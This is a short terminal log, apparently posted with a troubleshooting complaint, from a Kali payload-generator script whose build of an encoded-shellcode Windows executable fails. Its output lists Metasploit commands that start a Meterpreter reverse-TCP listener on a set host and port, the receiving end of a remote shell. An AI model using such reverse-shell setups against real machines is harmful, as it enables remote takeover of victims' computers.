> Generator goes brrrr
> Generating encoded shellcode
> Generating payload
The build failed. Fix the build errors and run again.
> Cleanup
cp: cannot stat '/home/kali/Desktop/payloadGenerator/Payload/bin/Release/net45/win10-x64/Payload.exe': No such file or directory
> Open msfconsole and run the following:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.168.10.128
set LPORT 11011
set EXITFUNC thread
run -j
You should see payload.exe now
The build failed. Fix the build errors and run again.
Same error for both